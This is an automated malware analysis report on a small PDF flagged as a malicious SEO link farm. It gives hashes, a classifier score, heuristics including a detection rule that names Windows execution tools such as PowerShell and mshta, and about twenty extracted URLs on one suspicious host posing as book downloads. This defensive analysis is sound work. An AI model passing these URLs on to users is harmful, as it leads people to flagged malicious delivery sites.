Malicious PDF — malware analysis report

Static analysis result for SHA-256 0a2a14c4c31acc06…

MALICIOUS

PDF

29.0 KB Created: 2020-03-20 10:09:23 +00:00 Authoring application: mPDF 5.7
MD5: 729c8f5065e91fc2b7db2d01ab867f1a SHA-1: c21ad750e80f7238685de55b1a3c920b0caa9e7b SHA-256: 0a2a14c4c31acc066fb76993a6012145b5be0dbf497dd8b7e9aacfbb57c77394
132 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment

The PDF contains a large number of embedded URLs, identified as a link farm, suggesting a tactic to manipulate search engine results or distribute malicious content. The ML classifier also flagged this PDF as malicious with high confidence. While no scripts were extracted, the presence of numerous external links and the heuristic firings indicate a malicious intent to redirect users to potentially harmful sites.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9895

Heuristics 3

  • Small PDF contains mass external PDF link farm critical PDF_SEO_LINK_FARM
    Small PDF contains many clickable external PDF links, mostly clustered on one host. This matches generated SEO/link-farm PDF carriers used to route users into malicious or unwanted-software delivery chains, rather than a normal document citation pattern.
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://hicsniso.myhome.cx/9e53e51e59e53e51/The-Complete-History-of-Aviation-From-Ballooning-to-Supersonic-Flight-by-Robert-Curley.pdf
    • http://hicsniso.myhome.cx/5e56e54e52e50e51/Articles-on-Aviation-Accidents-and-Incidents-in-1961-Including-Sabena-Flight-548-United-Airlines-Flight-859-Northwest-Orient-Airlines-Flight-706-1961-Cincinnati-Zantop-DC-4-Crash-Aero-Flight-311-1961-Yuba-City-B-52-Crash-by-Hephaestus-Books.pdf
    • http://hicsniso.myhome.cx/1e55e52e59e53/Flight-A-Panorama-Of-Aviation-by-Melvin-B-Zisfein.pdf
    • http://hicsniso.myhome.cx/6e50e57e58e59/Quest-for-Flight-John-J-Montgomery-and-the-Dawn-of-Aviation-in-the-West-by-Craig-S-Harwood.pdf
    • http://hicsniso.myhome.cx/1e51e58e57e56e50e57/Complete-Guide-To-Rutan-Homebuilt-Aircraft-Modern-Aviation-Series-by-Don-Downie.pdf
    • http://hicsniso.myhome.cx/6e55e54e50e57e50/Complete-Multilingual-Dictionary-Of-Aviation-And-Aeronautical-Terminology-English-French-Spanish-by-Henri-Demaison.pdf
    • http://hicsniso.myhome.cx/1e51e58e57e56e58e56/A-Century-of-Triumph-The-History-of-Aviation-by-Christopher-Chant.pdf
    • http://hicsniso.myhome.cx/9e53e51e55e58e53/James-Michael-Curley-by-Robert-Allison.pdf
    • http://hicsniso.myhome.cx/1e51e54e51e55e58e55/Technology-Innovation-of-Power-Transmission-Gearing-in-Aviation-by-Robert-F-Handschuh.pdf
    • http://hicsniso.myhome.cx/1e51e57e55e53e54e58/BHAGAVAD-GITA-MARATHI-Complete-Pocket-Size-984-pages-Portable-4x6-Inch-ONLY-418-gms-fits-in-purse-can-read-in-train-bus-flight-quot-BEST-SELLER-quot--Self-Help-Greatest-Motivational-Book-of-INDIA--ever-written-in-history-of-mankind-by-A-C-Bhaktivedanta-Swami-Prabhup-da.pdf
    • http://hicsniso.myhome.cx/9e53e51e57e56e57/The-Britannica-Guide-to-Inventions-That-Changed-the-Modern-World-by-Robert-Curley.pdf
    • http://hicsniso.myhome.cx/6e54e56e58e53e51/FAR-AIM-2007-Federal-Aviation-Regulations-Aeronautical-Information-Manual-by-Federal-Aviation-Administration.pdf
    • http://hicsniso.myhome.cx/9e53e51e57e55e54/Songs-Of-The-Sage-The-Poetry-Of-Curley-Fletcher-by-Curley-Fletcher.pdf
    • http://hicsniso.myhome.cx/7e55e57e57e50e51/History-of-the-Thirty-Years-War-Complete-History-of-the-Revolt-of-the-Netherlands-to-the-Confederacy-of-the-Gueux-by-Friedrich-Schiller.pdf
    • http://hicsniso.myhome.cx/9e53e51e55e58e58/Barney-Curley-Giving-A-Little-Back-by-Barney-Curley.pdf
    • http://hicsniso.myhome.cx/1e51e50e55e57e57e59/The-Flight-of-Georgiana-by-Robert-Neilson-Stephens.pdf
    • http://hicsniso.myhome.cx/8e51e50e53e54e56/A-Complete-History-of-the-Invasions-of-England-Including-the-Most-Memorable-Battles-and-Sea-Fights-from-Julius-Caesar-Down-to-the-French-Landing-in-Wales-in-1796-The-Calamites-of-France-Being-a-Catalogue-of-French-Cruelties-with-a-Complete-by-Anonymous.pdf
    • http://hicsniso.myhome.cx/6e50e52e54e53e51/Andr-e-s-Story-the-Complete-Record-of-His-Polar-Flight-1897-by-S-A-Andr-e.pdf
    • http://hicsniso.myhome.cx/4e51e50e57e57e55/Nameless-Cults-The-Complete-Cthulhu-Mythos-Fiction-of-Robert-E-Howard-by-Robert-E-Howard.pdf
    • http://hicsniso.myhome.cx/2e55e58e53e57e55/The-Flight-of-the-Falcon-The-True-Story-of-the-Escape-amp-Manhunt-for-America-s-Most-Wanted-Spy-by-Robert-Lindsey.pdf

Open this report in the interactive analyzer, or submit your own file for analysis.